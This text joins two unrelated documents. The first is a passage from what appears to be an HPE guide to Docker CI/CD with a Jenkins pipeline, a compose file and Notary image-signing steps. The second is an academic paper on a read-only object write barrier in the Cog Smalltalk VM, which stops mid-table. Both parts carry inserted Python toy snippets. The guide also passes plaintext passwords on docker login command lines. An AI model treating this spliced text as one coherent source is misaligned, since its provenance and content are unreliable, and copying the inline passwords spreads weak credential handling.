                sh "docker login --username jenkins --password ${readFile('./JENKINS_PASSWORD').trim()} 10.10.174.28"
                sh "docker push 10.10.174.28/dev/vote:0.$BUILD_NUMBER"
                sh "docker push 10.10.174.28/dev/result:0.$BUILD_NUMBER"
                sh "docker push 10.10.174.28/dev/worker:0.$BUILD_NUMBER"
                sh "docker logout 10.10.174.28"
            }
        }
    }
}
node("docker-cli") {
    stage("Deploy stack") {
        sh "docker stack rm vote"
        sh "sleep 30"
        sh "docker stack deploy --compose-file docker-stack.yml vote"
    }
}
```

Compose file for deploying stack

The compose file is used to create the required networks and services, deploying images from the local official and dev repositories. It determines the ports used, the restart policies and the placement of services based on the constraints specified.
```yaml
version: "3"
services:
  redis:
    image: 10.10.174.28/official/redis:3.2.9-alpine
    ports:
      - "6379"
    networks:
      - frontend
    deploy:
      replicas: 2
      update_config:
        parallelism: 2
        delay: 10s
      restart_policy:
        condition: on-failure
  db:
    image: 10.10.174.28/official/postgres:9.4
    volumes:
      - db-data:/var/lib/postgresql/data
    networks:
      - backend
    deploy:
      placement:
        constraints: [node.role == manager]
  vote:
    image: 10.10.174.28/dev/vote:0.$BUILD_NUMBER
    ports:
      - 5000:80
    networks:
      - frontend
    depends_on:
      - redis
    deploy:
      replicas: 2
      update_config:
        parallelism: 2
      restart_policy:
        condition: on-failure
  result:
    image: 10.10.174.28/dev/result:0.$BUILD_NUMBER
    ports:
      - 5001:80
    networks:
      - backend
    depends_on:
      - db
    deploy:
      replicas: 1
      update_config:
        parallelism: 2
        delay: 10s
      restart_policy:
        condition: on-failure
  worker:
    image: 10.10.174.28/dev/worker:0.$BUILD_NUMBER
    networks:
      - frontend
      - backend
    deploy:
      mode: replicated
      replicas: 1
      labels: [APP-VOTING]
      restart_policy:
        condition: on-failure
        delay: 10s
        max_attempts: 3
        window: 120s
      placement:
        constraints: [node.role == manager]
#  visualizer:
#    image: dockersamples/visualizer:stable
#    ports:
#      - "8080:8080"
#    stop_grace_period: 1m30s
#    volumes:
#      - /var/run/docker.sock:/var/run/docker.sock
#    deploy:
#      placement:
#        constraints: [node.role == manager]
networks:
  frontend:
  backend:
volumes:
  db-data:
```

**Appendix C: Content Trust implementation details**

**UCP Content Trust**

Add the devops1 and jenkins users to a new team, devops, in UCP. We use this team when specifying the signing criteria required in the user interface at UCP → Admin Settings → Content Trust.

**Install Notary client**

The documentation for installing and using the Docker Notary client is available at https://docs.docker.com/notary/getting_started/.

**Initialize trust metadata for official repositories**

There are two ways of initializing trust metadata: using a notary init/key rotate/publish cycle, or by pushing content for the first time to the repository.
Here we use both methods for the purposes of illustration.

**Initialize with Notary**

```bash
notary init 10.10.174.28/official/postgres
No root keys found. Generating a new root key...
Enter passphrase for new root key with ID 6fefae6:
Repeat passphrase for new root key with ID 6fefae6:
Enter passphrase for new targets key with ID 0a38a13 [10.10.174.28/official/postgres]:
Repeat passphrase for new targets key with ID 0a38a13 [10.10.174.28/official/postgres]:
Enter passphrase for new snapshot key with ID ebc4783 [10.10.174.28/official/postgres]:
Repeat passphrase for new snapshot key with ID ebc4783 [10.10.174.28/official/postgres]:
Enter username: devops1
Enter password:
```

```bash
notary key rotate 10.10.174.28/official/postgres snapshot -r
Enter username: devops1
Enter password:
Enter passphrase for root key with ID 6fefae6:
Enter passphrase for targets key with ID 0a38a13:
Successfully rotated snapshot key for repository 10.10.174.28/official/postgres
```

```bash
notary publish 10.10.174.28/official/postgres
Pushing changes to 10.10.174.28/official/postgres
Enter username: devops1
Enter password:
Enter passphrase for targets key with ID 0a38a13:
```

Add a delegation for the devops1 user for the official/postgres repository. Download the UCP client bundle for the devops1 user and copy and extract the zip file into a devops1 subdirectory. The public key for the devops1 user is ./devops1/cert.pem and the private key is at ./devops1/key.pem.
```bash
notary delegation add 10.10.174.28/official/postgres targets/releases --all-paths ./devops1/cert.pem
notary delegation add 10.10.174.28/official/postgres targets/official --all-paths ./devops1/cert.pem
notary publish 10.10.174.28/official/postgres
notary key import ./devops1/key.pem
Enter passphrase for new delegation key with ID 6ef873e [tuf_keys]:
Repeat passphrase for new delegation key with ID 6ef873e [tuf_keys]:
```

Now use the devops1 delegation key to sign the official postgres image:

```bash
docker tag postgres:9.4 10.10.174.28/official/postgres:9.4
export DOCKER_CONTENT_TRUST=1
docker login --username devops1 --password devops1password 10.10.174.28
docker push 10.10.174.28/official/postgres:9.4
Enter passphrase for delegation key with ID 6ef873e:
Successfully signed "10.10.174.28/official/postgres":9.4
```

**Initialize with push**

As an alternative to using notary init, you can push content to the repository to initialize trust metadata:

```bash
docker tag redis:3.2.9-alpine 10.10.174.28/official/redis:3.2.9-alpine
export DOCKER_CONTENT_TRUST=1
docker login --username devops1 --password devops1password 10.10.174.28
docker push 10.10.174.28/official/redis:3.2.9-alpine
Enter passphrase for root key with ID 6fefae6:
Enter passphrase for new repository key with ID b02c42b [10.10.174.28/official/redis]:
Repeat passphrase for new repository key with ID b02c42b [10.10.174.28/official/redis]:
Finished initializing "10.10.174.28/official/redis"
Successfully signed "10.10.174.28/official/redis":3.2.9-alpine
```

Again, you set up delegation keys for the official/redis repository for the devops1 user and then push the redis image, specifying the passphrase for the delegation key. At this point, it is useful to create a test service in UCP using the image you have just pushed, to check that the signing has been performed correctly and that the image passes the signing criteria specified in UCP → Admin Settings → Content Trust.
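Conceptually, the delegation steps above mean that UCP will only accept a tag whose signature chains to a key delegated for that repository. The toy Python model below is purely our illustration of that acceptance rule (it is not the Notary/TUF implementation, and the key IDs are the illustrative ones from the transcripts above):

```python
# Toy model: repository -> set of delegated signing key IDs.
delegations = {
    "official/postgres": {"6ef873e"},  # devops1's delegation key (illustrative)
    "official/redis": {"6ef873e"},
}

def accept_signed_tag(repo, signing_key_id):
    """Accept a signed tag only if the signing key is delegated for the repo."""
    return signing_key_id in delegations.get(repo, set())

print(accept_signed_tag("official/postgres", "6ef873e"))  # delegated key
print(accept_signed_tag("official/postgres", "deadbee"))  # unknown key
```

In the real system this check is backed by certificates in the repository's TUF metadata rather than a lookup table, but the accept/reject outcome is the same.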
**Initialize trust metadata for dev repositories**

We follow the same procedure for the dev repositories, this time copying and expanding the UCP client bundle for the jenkins user into a ./jenkins subfolder:

- Initialize the trust metadata for each of the three repositories, dev/vote, dev/result and dev/worker.
- Create delegation keys for each repository using the ./jenkins/cert.pem file.
- Import the private key for the jenkins user from the ./jenkins/key.pem file.
- Log in to the local DTR repository as the jenkins user, set DOCKER_CONTENT_TRUST=1 and push the images from the latest build (0.26 in our case).

**Deploy the stack in UCP**

In UCP, use Resources → Stacks & Applications → Deploy to deploy the stack, as shown below in Figure 9. If successful, you should see the networks and services being deployed, as shown below in Figure 10.

Figure 9. Deploy stack

Figure 10. Creating networks and services

By contrast, using the previous build images (0.25) that were not signed, you will see an error as shown below in Figure 11.

Figure 11. Failed deployment

**Resources and additional links**

- HPE Reference Architectures, hpe.com/info/ra
- HPE Servers, hpe.com/servers
- HPE Storage, hpe.com/storage
- HPE Networking, hpe.com/networking
- HPE Technology Consulting Services, hpe.com/us/en/services/consulting.html

Because of the rapidly changing nature of the container landscape, it is important to monitor the latest developments and their impacts on CI/CD and security. The Docker Captains, https://www.docker.com/community/docker-captains, are a group of cross-industry Docker specialists who actively share up-to-date knowledge, and it is recommended that you follow the blogs of those captains who focus on security concerns.

To help us improve our documents, please provide feedback at hpe.com/contact/feedback.
A low Overhead Per Object Write Barrier for the Cog VM

Clément Bera

To cite this version: Clément Bera. A low Overhead Per Object Write Barrier for the Cog VM. IWST 16, 2016, Prague, Czech Republic. Proceedings of the 11th edition of the International Workshop on Smalltalk Technologies. <10.1145/2991041.2991063>. <hal-01356338>

HAL Id: hal-01356338
https://hal.archives-ouvertes.fr/hal-01356338
Submitted on 26 Aug 2016

HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers.

Abstract

In several Smalltalk implementations, a program can mark any object as read-only (unfortunately sometimes miscalled immutable). Such read-only objects cannot be mutated unless the program explicitly reverts them to a writable state. This feature, called write barrier, may induce noticeable overhead if not implemented carefully, both in memory footprint and execution time. In this paper I discuss the recent addition of the write barrier in the Cog virtual machine and the support introduced in the Pharo 6 image. I detail specific aspects of the implementation that allow, according to the multiple evaluations presented in the paper, such a feature to come with little to no overhead.

Keywords Language Virtual Machine, Just-in-Time Compilation, Interpreter, Write Barrier, Store Check.

1.
Introduction

Read-only objects are frequently used in several Smalltalk dialects to ensure the unchangeable state of runtime objects such as compiled methods' literals, and in the context of object modification tracker frameworks such as Gem Builder for Smalltalk¹ (GBS). The Cog virtual machine (VM) [11] is the most widely used open source Smalltalk virtual machine, with multiple Smalltalk clients: Pharo [2], Squeak [8] and Cuis [3]. Unfortunately, the Cog VM did not support read-only objects. I decided to introduce such a feature, with the help and advice of the lead Cog VM architect, Eliot Miranda. In this paper, I discuss the design decisions behind the write barrier and the implementation in both the Cog VM and the Pharo 6 implementation. Other Smalltalk clients run-

¹ GBS is a tool maintained and evolved by GemTalk™ Systems allowing applications written in any Smalltalk dialect to communicate with the Gemstone persistence layer.

Conceptually, having read-only objects requires each store into an object to have an extra check that fails the store if the mutated object is read-only. An extra check induces extra memory and execution time overhead, as additional machine instructions are required to perform the check. In addition, the memory representation of the object needs to be adapted to encode the read-only property of the object. The main challenge in the write barrier implementation is to reduce the overhead, both in terms of memory footprint and execution time, as much as possible. In most VMs for high-level object-oriented languages, each store into an object already has multiple checks for the garbage collector (GC) write barrier [9, 10]. In the implementation sections, I detail the most critical part: how the machine code generated by the JIT shares portions of machine code between the read-only check and the existing GC write barrier to limit the overhead.

2.
Problem

In this section I specify what I mean by a read-only object write barrier, discuss the terminology used, then briefly describe some use-cases and state the problem precisely.

2.1 Specification

The feature wanted, the write barrier, allows a Smalltalk program to mark or unmark any non-immediate object² as read-only at any time. Any write into a read-only object is intercepted before the object is mutated, and it should be possible to handle the mutation failure at the language level.

² Non-immediate objects have a memory zone holding the object's state, and references to the object are implemented through pointers to that memory zone. On the contrary, immediate objects are not present in memory and their state is directly encoded in the pointer referencing the immediate object. The best example of immediate objects are 31-bit signed integers, also called SmallIntegers.

2.2 Terminology

This feature is called immutability in some other Smalltalks, especially VisualWorks. Using the term immutability was contested by the Smalltalk community. Indeed, in object-oriented and functional programming, for example in Racket [4], an immutable object is an object whose state cannot be modified after it is created. Therefore, in our case, as the programmer can revert the read-only state of an object to a writable state at any time, the immutability definition does not apply. This is why in Pharo and in this paper the feature is called write barrier and not immutability.

2.3 Use-cases

There are multiple use-cases for read-only objects. I detail here the two most common ones.

Modification tracker. The most popular use-case is the ability to track the mutations done to a specific object. In this case, the tracked object is marked as read-only. Each mutation of the tracked object triggers Smalltalk code specified by the programmer to do something about the mutation, for example, logging.
Then, the modification tracker framework temporarily makes the object writable, performs the mutation, and marks the object back as read-only to resume the execution while still tracking the object's mutations. This modification tracking ability is for example used in GBS, a framework to deeply integrate a Smalltalk application with the Gemstone persistence layer.

Core read-only objects. Another interesting read-only object use-case is the ability to mark runtime objects such as compiled methods' literals as read-only. Having the literals read-only allows compilers to make stronger assumptions enabling more aggressive optimisations, and forbids inconsistent modification of literals, avoiding hard-to-debug issues.

2.4 Problem: limiting the overhead

The problem statement is as follows: *Is it possible to mark an object as read-only, forbidding any mutations and letting Smalltalk code handle the mutation failures, with little to no overhead in terms of memory footprint and execution time?*

To solve this problem, I chose to extend the virtual machine. Indeed, I believe the solutions provided at image level either induce an important overhead or are not thorough enough. For example, it is possible using reflective APIs to activate any primitive operation on any object in the system. Some primitive operations, such as the at:put: primitive, mutate objects. Detecting such mutations is very difficult, likely even impossible, without VM support.

The solution was implemented in three steps:

- Enhancing the memory representation of objects to be able to encode their read-only state.
- Adding support in the execution engine to forbid mutations of read-only objects.
- Adding support in the Pharo image to be able to use the new feature.

Memory representation of objects. To support read-only objects, the first thing is to change the memory representation of objects to be able to mark them as read-only.
To do so, each object needs a specific memory location to encode the state: is the object read-only or not? As in other Smalltalk dialects, a bit seems appropriate as there are only two possible cases. I detail later in the paper the position of this bit. As the bit is in the object's header and immediate objects have no header, immediate objects cannot be read-only. The VM can directly access the object's state, but the Smalltalk code cannot. So I added two convenience primitives in Pharo to access the bit state. One primitive tells if an object is read-only or not, the other sets the object as read-only or writable.

Execution support. Objects are mutated in two main ways in the current virtual machine:

- By storing into one of their instance variable fields (bytecode instruction).
- By performing a primitive operation that mutates objects, such as at:put:.

In the paper I explicitly omit another case, literal variable stores. For the execution engine, a literal variable store is an instance variable store mutating the second field of an object specified in the literal frame of the method. Hence, the discussions related to instance variable stores also apply to literal variable stores.

In the execution engine, the instance variable store code was changed to fail if the mutated object is read-only. If that happens, a call-back is triggered in the image to inform the program that an attempt to assign a value to a read-only object was made, and once the call-back returns, the execution resumes after the store. The call-back is triggered instead of the store, hence if one wants the store to be performed one needs to do it explicitly in the call-back. The code of the primitives mutating objects was rewritten to fail the primitive if they mutate a read-only object.

Limitations. While implementing the solution, I realized it is really difficult to make a few specific objects read-only. The first problem is related to process scheduling.
At each interrupt point, the execution may switch to another process. Switching from one process to another implies multiple mutations of process scheduling objects, whereas the execution state (in the middle of a process switch) is not in a state where a call-back can be safely triggered in the image. The second issue lies with context objects. Contexts represent method and closure activations. They are handled very specifically in the virtual machine for performance and they are mutated all the time during normal execution: any bytecode operation requires at least a mutation of the active context's program counter. Lastly, by design, the VM assumes that temp vectors (data structures used to store closure enclosing context information) are never read-only.

To solve these problems, I specify here a list of objects that cannot be marked as read-only. Any attempt to mark those objects as read-only from Smalltalk will fail. These objects are:

- Context instances
- All objects related to process scheduling:
  - the global variable Processor
  - the array of linked lists of processes (Processor instance variable)
  - ProcessLinkedList instances
  - Process instances
  - Semaphore instances

In addition to those objects, specific objects used directly by the runtime cannot be marked as read-only. One example is temp vectors, which are used to hold block closures' remote variable values, but also objects internal to the VM such as the class table. I discuss in future work how one may be able to bypass some of those limitations.

3. Image API design and implementation

In this section I introduce the APIs added in the image to support read-only objects. I do not discuss the in-image implementation of features using the write barrier, such as an object modification tracker. I discuss only the interface between the virtual machine and the image allowing one to use the write barrier and to build features such as an object modification tracker.
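To make the intended semantics concrete before presenting the Smalltalk API, here is a toy Python simulation of the write barrier described above. This is purely an illustration of the concept (the class and method names are ours, and it has none of the VM's header-bit or JIT machinery): each object carries a read-only flag, and a store into a read-only object triggers a call-back instead of mutating the object.

```python
class Trackable:
    """Toy write barrier: attribute stores on a read-only object
    trigger a call-back instead of mutating the object."""

    def __init__(self):
        # Bypass our own barrier while initializing.
        object.__setattr__(self, "_read_only", False)
        object.__setattr__(self, "_log", [])

    # Counterparts of isReadOnlyObject / setIsReadOnlyObject:
    def is_read_only(self):
        return self._read_only

    def set_read_only(self, flag):
        object.__setattr__(self, "_read_only", flag)

    def attempt_to_assign(self, name, value):
        """Call-back on a failed store; here we just log the attempt."""
        self._log.append((name, value))

    def __setattr__(self, name, value):
        if self._read_only:
            self.attempt_to_assign(name, value)  # store is NOT performed
        else:
            object.__setattr__(self, name, value)

obj = Trackable()
obj.x = 1                # writable: store succeeds
obj.set_read_only(True)
obj.x = 2                # read-only: call-back logs, x stays 1
print(obj.x, obj._log)   # 1 [('x', 2)]
```

As in the VM, the call-back replaces the store; a modification tracker wanting the store to happen would make the object writable, perform it explicitly, and mark the object read-only again.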
3.1 Core write barrier primitives

Two main primitives were added into the Object class:

- Object#isReadOnlyObject
- Object#setIsReadOnlyObject:

**Object#isReadOnlyObject.** The primitive answers whether the receiver is read-only. The primitive cannot fail on a VM supporting the write barrier. The primitive method code is available in Figure 1. The Pharo 6 alpha version is available with additional comments, omitted in the paper.

```smalltalk
Object#isReadOnlyObject
	<primitive: 163>
	^self primitiveFailed
```

**Figure 1.** Object#isReadOnlyObject primitive

**Object#setIsReadOnlyObject:** This second primitive marks the receiver as being read-only or writable, depending on the boolean parameter. The primitive method code is available in Figure 2.

```smalltalk
Object#setIsReadOnlyObject: aBoolean
	<primitive: 164 error: ec>
	^self primitiveFailed
```

**Figure 2.** Object#setIsReadOnlyObject: primitive

Why a single primitive taking a boolean parameter instead of two methods? The answer is simple: the number of primitives has to be kept as small as possible to keep the VM implementation simple, hence sharing the same primitive number for these two operations seemed the right thing to do. However, for convenience, two helper methods were added, Object#beWritableObject and Object#beReadOnlyObject, only calling the primitive with the corresponding boolean parameter, as shown in Figure 3.

```smalltalk
Object#beWritableObject
	^self setIsReadOnlyObject: false

Object#beReadOnlyObject
	^self setIsReadOnlyObject: true
```

**Figure 3.** Helper methods

3.2 Primitive failure

As stated in Section 2.4, primitive operations mutating objects should fail if they attempt to mutate a read-only object. Two modifications are required to support the write barrier.

**Image-side.** Each primitive failure fall-back code needs to be edited to raise an appropriate error if it failed due to the write barrier.
For example, in the case of the primitive for at:put:, the in-image fall-back code should check if the receiver is read-only, raising an appropriate error (for example 'object cannot be modified') instead of 'Instances of Objects are not indexable'. Unfortunately, this part has not, at the time I write this paper, been integrated in the Pharo 6 alpha.

**VM-side.** To help the programmer understand why a primitive fails, the virtual machine is able to provide error messages. This is done by adding the keyword error: in the primitive pragma. For example, in Figure 2, the primitive pragma has the error: keyword, hence if the primitive fails the temporary variable ec is going to hold an error message. The special objects array defines a list of error messages that can be answered by the VM. This list now defines the message 'no modification', which is raised when a primitive fails due to the write barrier.

3.3 Instance variable store

As instance variable stores are encoded directly in the bytecode and not through message sends as primitives are, they cannot simply fail or the VM state would be inconsistent. The easiest way to handle this case was to add a VM call-back to be performed when a store fails. An infrastructure for such call-backs is already available and is used, for example, for doesNotUnderstand:. However, this VM call-back is more difficult to implement. Our specification requires the read-only failure to resume execution, once the call-back is done, after the variable store. The problem is that the VM does not expect any value to be pushed on the stack after a variable store. If we take the example of doesNotUnderstand:, the call-back is triggered during a message send. In Smalltalk, each message send is expected to return a value, hence the value returned by the doesNotUnderstand: method activation is pushed on the stack instead of the regular message send returned value.
In the read-only call-back case, the VM does not expect any value to be pushed on the stack after a variable store. Therefore, I needed to design a call-back that does not answer any value. This is currently possible in Pharo by modifying the active process. The cannotAssign:withIndex: call-back was designed this way. After handling the mutation failure, the call-back does not return any value, as the Smalltalk code in Figure 4 shows. The comment "CANT REACH" indicates that the execution flow cannot reach that part of the code.

```plaintext
attemptToAssign: value withIndex: index
	| process |
	"Handle here the mutation failure. Code omitted."
	"Process modified to return no value"
	process := Processor activeProcess.
	[ | sender |
	sender := process suspendedContext sender.
	process suspendedContext: sender. ]
		forkAt: Processor activePriority + 1.
	Processor yield.
	"CANT REACH"
```

**Figure 4.** Pharo call-back implementation

This implementation is a temporary solution as it cannot work with processes already at the maximum priority. I am considering alternatives, such as a new primitive or a bytecode instruction performing a return that does not push any value.

3.4 Other in-image features

**Support flags.** The Cog VM provides to the Smalltalk clients a set of parameters. A new parameter was added, answering whether the VM currently used supports read-only objects. In the case of Pharo, it is now possible to run Smalltalk VM supportsWriteBarrier to know if the feature is enabled.

**Mirror primitives.** The Cog VM, as well as several other Smalltalk VMs, supports having objects whose class does not inherit from Object. Such objects are typically used for proxies. Sending messages to this kind of object can be a problem: the object may not be able to answer the message nor to answer the doesNotUnderstand: message, leading to a VM crash.
This kind of problem usually happens when the programmer attempts to debug a program with proxy objects: in this case, the proxies understand all the messages required by the application, but do not understand the messages required for debugging. To avoid VM crashes, proxies are debugged through mirror primitives. For example, the primitive instVarAt: answers the value of an instance variable of an object. This primitive exists in two variants:

- instVarAt: Answers an instance variable of the receiver.
- object:instVarAt: Answers an instance variable of the object passed as first argument.

The second version, ignoring the receiver entirely, is called a mirror primitive. It is able to perform a primitive operation on an object (in this case, the first argument) without requiring the object to be able to understand a message. In the context of the write barrier, the two primitives isReadOnlyObject and setIsReadOnlyObject: are also available as mirror primitives (the primitive number is shared), in the form of object:isReadOnlyObject and object:setIsReadOnlyObject:. This way, it is possible to read and modify the read-only property of proxy objects.

4. VM implementation

The VM implementation is split in three subsections: the object representation, the interpreter and the JIT compiler changes.

4.1 Object representation

Each non-immediate object is represented in memory with an object header, describing the object, and multiple fields, depending on the object's layout. Several bits in the object header are unused and a single bit was reserved by design in the Spur Memory Manager [12] for the write barrier. I used this bit to mark the read-only state of an object, as shown in Figure 5.
**Figure 5.** Object header memory representation in Spur. The header contains the following fields: number of slots, object format, identity hash, class index, the flag bits (is remembered?, is marked?, is grey?, is pinned?, isReadOnly?) and unused bits.

4.2 Interpreter implementation

4.2.1 Primitives. I needed to add support for primitives to fail if they attempt to mutate a read-only object. Many primitives can already fail. For example, `<primitive: 1>`, the addition between two small integers, fails if the argument is not a small integer. Hence, I needed to edit all the primitives mutating objects to first check if the mutated object is read-only, and fail the primitive if this is the case. This was quite tedious as I had to go through the whole primitive table and check manually, for each primitive, whether the code mutates an object. The task was simplified by the limitations: as stated in Section 2.4, several objects cannot be read-only, so the primitives related to process scheduling and context accessing did not need to be changed.

4.2.2 Instance variable stores. I needed to update the interpretation of instance variable stores to fail and trigger the `cannotAssign:withIndex:` call-back if the mutated object is read-only. Some aspects are challenging.

**Interpreter compilation and emulation.** The interpreter code is written in Slang, a DSL for writing virtual machines that uses the Smalltalk syntax, making it possible to emulate the execution on top of the Smalltalk VM. For the production VM, Slang is compiled to C with the GNU extensions, which is then compiled to machine code. The C-language extensions are critical for performance, as an interpreter has a very different behavior than mainstream C applications.

**C extension constraints.** Most of the interpreter code is compiled into a single C function.
That function uses the C extensions to fix specific values to registers, such as the Smalltalk stack pointer, frame pointer and instruction pointer. The execution jumps quickly from the interpretation of one bytecode to the next one, using threaded jumps to the next bytecode's execution code address. If the interpreter needs to call another function, it needs to save the fixed registers manually and restore them upon function return if they are going to be used.

**Challenges met.** This specificity is sometimes difficult to handle because the execution flow in the extended C code is non-trivial to reproduce in the simulation engine, which runs on top of the Smalltalk VM. In addition, one has to be very careful, if the interpreter calls a function that is not inlined during the Slang-to-C compilation of the main interpreter function, to correctly maintain the register state.

**Conclusion.** To implement the read-only write barrier, both the simulation engine used for debugging and the extended C code need to have the same behavior according to the new specification.

4.3 JIT compiler support

4.3.1 Primitives. As for the interpreter, I needed to update the JIT to compile primitive operations according to the new specification.

**Primitives redefined in the JIT.** The interpreter primitives are normally written in Slang and are compiled to machine code like the rest of the VM. As the compilation is done through the optimizing C compiler, the primitives' performance is usually very good. However, calling C code from a machine code Smalltalk method has a cost: the runtime needs to switch from the Smalltalk machine code runtime to the C runtime, execute the primitive, then switch back to the Smalltalk machine code runtime. This cost can be significant for very frequently used primitives, such as the addition between two small integers.
For this purpose, a set of primitives is redefined in the JIT's register transfer language (RTL)¹ and compiled to machine code together with the methods holding the corresponding primitive number. For the purpose of this paper, we will consider that there are two kinds of primitives:

- Frequently called primitives: they are redefined in the JIT's RTL.
- Rarely called primitives: when a method with such a primitive is compiled to machine code, the machine code switches to the C runtime and then calls the interpreter primitive code.

All the existing interpreter primitive code was updated to fail for read-only objects. However, the primitives redefined in the JIT's RTL also needed to be updated to correctly fail if they mutate a read-only object.

**Updating `at:put:`.** Fortunately, only two primitives considered frequently called, and therefore defined in the JIT's RTL, mutate objects. One of them is the primitive `at:put:` while the other one is a specific version of `at:put:` for strings. I updated these two primitives to generate machine code failing if the receiver is read-only.

4.3.2 Instance variable stores. With the write barrier, the machine code generated for instance variable stores requires an extra check to fail if the mutated object is read-only.

**Studied case.** The JIT compiles stores to machine code differently depending on multiple constraints. For example, the compilation differs depending on which registers are live when compiling the store. In this subsection, I will only discuss the most common case, a generic instance variable store into the first instance variable of an object, which we will call a `lambda store`. Other cases are handled in a similar way.

---

¹ A register transfer language (RTL) is a kind of intermediate representation that is very close to assembly language, similar to those used by compilers. RTLs describe data flow at the register-transfer level of an architecture.
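The behavior described for the updated `at:put:` primitives can be sketched outside the VM. The following Python model is illustrative only: the `PRIM_*` result codes, the `slots` list and the `read_only` attribute are inventions of the sketch, not VM structures; in the real VM the failure selects the ‘no modification’ error message described in Section 3.2.

```python
# Toy model of a mutating primitive with the added read-only check.
PRIM_OK, PRIM_FAIL_NO_MODIFICATION, PRIM_FAIL_BAD_INDEX = range(3)

class ToyArray:
    """Stand-in for an indexable object with a read-only header bit."""
    def __init__(self, size):
        self.slots = [None] * size
        self.read_only = False

def primitive_at_put(receiver, index, value):
    # The read-only check comes first: a read-only receiver must fail
    # before any mutation, with the write-barrier-specific error code.
    if receiver.read_only:
        return PRIM_FAIL_NO_MODIFICATION
    if not 1 <= index <= len(receiver.slots):  # 1-based, as in Smalltalk
        return PRIM_FAIL_BAD_INDEX
    receiver.slots[index - 1] = value
    return PRIM_OK
```

A writable receiver is mutated normally; marking it read-only makes the same call fail without touching the slots.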
**GC store check.** Before the write barrier implementation, a lambda store needed to update the value of the instance variable in memory and to deal with the GC write barrier. Currently, the GC requires each old space object referencing a young object to be in the remembered table. Hence, each store may require the VM to add an entry to the remembered table. Each store generates machine code to check if the object needs to be added to the remembered table. If this is the case, the VM calls a trampoline which saves the register state, calls the interpreter function adding the object to the remembered table, restores the registers and resumes execution. The existing machine code generated for a lambda store is shown in Figure 6.

**Figure 6.** Vanilla lambda store

<table>
<thead>
<tr> <th>x86 Assembly</th> <th>Meaning</th> </tr>
</thead>
<tbody>
<tr> <td>movl -12(%ebp), %edx</td> <td>Load the receiver in %edx.</td> </tr>
<tr> <td>popl %edi</td> <td>Load the value to store in %edi.</td> </tr>
<tr> <td>movl %edi, %ds:0x8(%edx)</td> <td>Perform the store in the first instance variable using both registers (%edx and %edi).</td> </tr>
<tr> <td>testl 0x00000003, %edi<br>jnz after_store</td> <td>If the value to store is immediate, jump after the store check.</td> </tr>
<tr> <td>movl 0x00040088, %eax<br>cmpl %eax, %edx<br>jb after_store</td> <td>If the receiver is young, jump after the store check (compare the young object space limit with the receiver address).</td> </tr>
<tr> <td>cmpl %eax, %edi<br>jnb after_store</td> <td>If the value to store is an old object, jump after the store check.</td> </tr>
<tr> <td>movzb %ds:0x3(%edx), %eax<br>testb 0x20, %al<br>jnz after_store</td> <td>If the receiver is already in the remembered table, jump after the store check.</td> </tr>
<tr> <td>call store_check_trampoline</td> <td>Call the store check trampoline.</td> </tr>
<tr> <td>after_store:</td> <td>Code following the store.</td> </tr>
</tbody>
</table>

**Figure 7.** Considered read-only check

<table>
<thead>
<tr> <th>x86 Assembly</th> <th>Meaning</th> </tr>
</thead>
<tbody>
<tr> <td>movl %ds:(%edx), %eax<br>testl 0x00800000, %eax<br>jz begin_store</td> <td>If the receiver is writable, jump to the store.</td> </tr>
<tr> <td>call cannot_assign_trampoline</td> <td>Call the read-only failure trampoline.</td> </tr>
<tr> <td>movl -12(%ebp), %edx<br>jmp after_store</td> <td>Restore the receiver (to keep its register live) and jump after the store.</td> </tr>
<tr> <td>begin_store:</td> <td>Next instruction is the first store instruction.</td> </tr>
</tbody>
</table>

This solution implied quite some overhead, because the machine code needed to take an extra branch on the common path and because many new machine instructions were added per instance variable store.

**Efficient read-only check.** I then built a second solution, where a single per-store trampoline is shared between the GC and the read-only write barrier, as shown in Figure 8. As the instruction calling the trampoline is the one taking the most bytes, the general idea was to avoid most of the overhead by having a single call. I created new trampolines that are able to deal with both the GC case and the read-only write barrier case. In this new version, the machine code first tests if the object is read-only, and if so, directly jumps to the shared trampoline.

**New trampolines.** To be able to share the trampoline without adding too many instructions, and as the trampoline is rarely taken, the trampoline duplicates the read-only check. The normal execution flow checks if the object is read-only and jumps to the trampoline if it is the case.
In the trampoline, the VM does not know any more whether the trampoline was reached for a read-only mutation failure or for the GC write barrier. Hence, the trampoline tests again if the mutated object is read-only and calls the correct interpreter method to handle either case.

**Specialized trampolines for common indexes.** In the case of a read-only mutation failure, to perform the call-back, the VM has to know the variable index of the object. In the case of a lambda store, we said the instance variable was the first instance variable, so in a 0-based array, the variable index is 0. The problem is that, to perform the trampoline call, the variable index needs to be passed as a parameter, requiring extra machine instructions per store (in the Cog VM all trampoline parameters are passed by registers). To avoid the extra instructions, the trampoline is duplicated. A fixed number of trampolines, based on a VM setting, are created (currently 6). Each of the most common variable indexes (0 to 4) can call a specialized version of the trampoline⁴ for the given index (so it is not required to pass the variable index by parameter in those common cases), and the other, less common, variable indexes call the generic trampoline, passing the variable index as a parameter.

**Register liveness.** As the read-only failure trampoline creates a new stack frame for the cannotAssign:withIndex: call-back, registers cannot remain live across the trampoline. I decided to keep the receiver live, if it was already live before the store, by injecting the corresponding machine code after the store, as a live receiver is the most critical for performance. Hence, only the receiver can remain live in a register across the read-only write barrier trampoline call.

---

⁴ A trampoline is a specific machine code routine switching from the assembly code runtime to the C runtime.
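The index specialization above can be sketched as follows. This is a Python illustration of the dispatch scheme only, with invented names; the `calls` log stands in for the machine-code side effects, and the specialized trampolines simply capture their index instead of having it encoded in generated code.

```python
# Sketch of per-index trampoline specialization: the five most common
# variable indexes (0 to 4) get a dedicated trampoline with the index
# baked in, so no index argument has to be materialized at the call
# site; rarer indexes fall back to a generic trampoline taking the
# index as a parameter. Six trampolines in total, as in the text.
NUM_SPECIALIZED = 5
calls = []   # stand-in for the interpreter call-back actually performed

def generic_trampoline(receiver, index):
    calls.append(('generic', index))

def make_specialized(index):
    def trampoline(receiver):        # no index parameter needed
        calls.append(('specialized', index))
    return trampoline

SPECIALIZED = [make_specialized(i) for i in range(NUM_SPECIALIZED)]

def read_only_store_failed(receiver, index):
    if index < NUM_SPECIALIZED:
        SPECIALIZED[index](receiver)       # common case: cheaper call
    else:
        generic_trampoline(receiver, index)
```

The design choice mirrors the text: the specialized entries trade a small, fixed amount of duplicated trampoline code for fewer instructions on every store site.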
<table>
<thead>
<tr> <th>x86 Assembly</th> <th>Meaning</th> </tr>
</thead>
<tbody>
<tr> <td>movl -12(%ebp), %edx</td> <td>Load the receiver in %edx.</td> </tr>
